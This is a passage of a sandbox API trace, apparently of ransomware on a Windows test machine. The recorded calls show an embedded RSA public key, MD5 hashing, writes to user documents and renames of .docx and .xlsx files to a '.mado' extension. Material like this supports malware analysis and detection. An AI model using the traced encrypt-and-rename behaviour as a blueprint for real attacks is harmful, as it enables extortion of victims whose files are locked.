HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.061] GetCurrentThreadId () returned 0x600 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3578 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6f0a8 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe058 [0204.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe010 [0204.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe028 [0204.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdff8 [0204.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe070 [0204.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe040 [0204.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe088 [0204.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe010 | out: hHeap=0x2c0000) returned 1 [0204.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe010 [0204.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0204.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe058 | out: hHeap=0x2c0000) returned 1 [0204.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bdb0 [0204.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe088 | out: hHeap=0x2c0000) returned 1 [0204.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x33109f0 [0204.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bb80 [0204.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bc98 [0204.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe010 | out: hHeap=0x2c0000) returned 1 [0204.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3310c08 [0204.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33109f0 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310c08 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe040 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe070 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe028 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdff8 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdfe0 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6e438 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6f0a8 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0204.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.065] WriteFile (in: hFile=0x63c, lpBuffer=0x3b80690*, nNumberOfBytesToWrite=0x12789, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b80690*, lpNumberOfBytesWritten=0x39cfb14*=0x12789, lpOverlapped=0x0) returned 1 [0204.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0204.065] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1278e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.065] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6ee98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6ee98*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff0c0 [0204.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3310808 [0204.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3310808, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b70b68 [0204.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff0c0 | out: hHeap=0x2c0000) returned 1 [0204.066] WriteFile (in: hFile=0x63c, lpBuffer=0x3b70b68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b70b68*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b70b68 | out: hHeap=0x2c0000) returned 1 [0204.066] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.066] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.066] CloseHandle (hObject=0x63c) returned 1 [0204.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0204.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b70b68 [0204.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0204.067] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LYGm7s5W9niIJnIJRT.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lygm7s5w9niijnijrt.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LYGm7s5W9niIJnIJRT.docx.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lygm7s5w9niijnijrt.docx.mado")) returned 1 [0204.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b70b68 | out: hHeap=0x2c0000) returned 1 [0204.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.068] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0204.069] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f6951f0, ftCreationTime.dwHighDateTime=0x1d5e642, ftLastAccessTime.dwLowDateTime=0x21dbe000, ftLastAccessTime.dwHighDateTime=0x1d57c0b, ftLastWriteTime.dwLowDateTime=0x21dbe000, ftLastWriteTime.dwHighDateTime=0x1d57c0b, nFileSizeHigh=0x0, nFileSizeLow=0x33c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mH0lFHceDUbr9.xlsx", cAlternateFileName="MH0LFH~1.XLS")) returned 1 [0204.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff0c0 [0204.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2ef090 [0204.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff0c0 | out: hHeap=0x2c0000) returned 1 [0204.069] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mH0lFHceDUbr9.xlsx") returned=".xlsx" [0204.069] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mH0lFHceDUbr9.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mh0lfhcedubr9.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.070] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=13255) returned 1 [0204.070] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.073] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x33a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.073] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.074] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.074] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x33c7, lpOverlapped=0x0) returned 1 [0204.075] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0204.075] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.075] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.075] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0204.076] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.076] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.076] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.076] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.076] GetLastError () returned 0x0 [0204.076] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.076] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0204.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.076] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.076] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.076] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x33d0) returned 0x3b70b68 [0204.077] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e438 [0204.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdfe0 [0204.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e480 [0204.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdff8 [0204.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe028 [0204.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe070 [0204.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe040 [0204.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b68078 [0204.077] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c6a8 [0204.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b73f40 [0204.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe028 | out: hHeap=0x2c0000) returned 1 [0204.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe040 | out: hHeap=0x2c0000) returned 1 [0204.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe070 | out: hHeap=0x2c0000) returned 1 [0204.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b73f40 | out: hHeap=0x2c0000) returned 1 [0204.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe070 [0204.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe040 [0204.078] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x33c7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.078] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6ee98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6ee98*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.078] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.078] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.078] CloseHandle (hObject=0x63c) returned 1 [0204.079] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mH0lFHceDUbr9.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mh0lfhcedubr9.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mH0lFHceDUbr9.xlsx.mado" (normalized: "c:\\users\\5p5nrgjn0js 